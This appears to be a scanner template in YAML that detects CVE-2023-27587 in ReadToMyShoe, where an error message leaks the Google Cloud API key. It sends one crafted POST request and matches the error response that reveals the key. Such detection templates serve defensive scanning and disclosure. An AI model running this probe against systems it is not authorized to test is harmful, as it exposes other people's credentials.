54 lines
1.6 KiB
YAML
54 lines
1.6 KiB
YAML
id: CVE-2023-27587
|
|
|
|
info:
|
|
name: ReadToMyShoe - Google Cloud API Disclosure
|
|
author: vagnerd
|
|
severity: medium
|
|
description: |
|
|
If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key.
|
|
reference:
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27587
|
|
- https://github.com/rozbb/readtomyshoe/security/advisories/GHSA-23g5-r34j-mr8g
|
|
- https://github.com/sec-fx/CVE-2023-27587-PoC
|
|
- https://github.com/rozbb/readtomyshoe/commit/8533b01c818939a0fa919c7244d8dbf5daf032af
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2023-27587
|
|
cwe-id: CWE-209
|
|
tags: cve,cve2023,debug,readtomyshoe,disclosure
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /api/add-article-by-text HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/json
|
|
|
|
{
|
|
"title":"Kernsicherheitstest",
|
|
"body":"Kernsicherheitstest"
|
|
}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Caused by:"
|
|
- "TTS request failed"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/plain"
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|
|
|
|
- type: dsl
|
|
dsl:
|
|
- '!contains((body), ''https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED'')'
|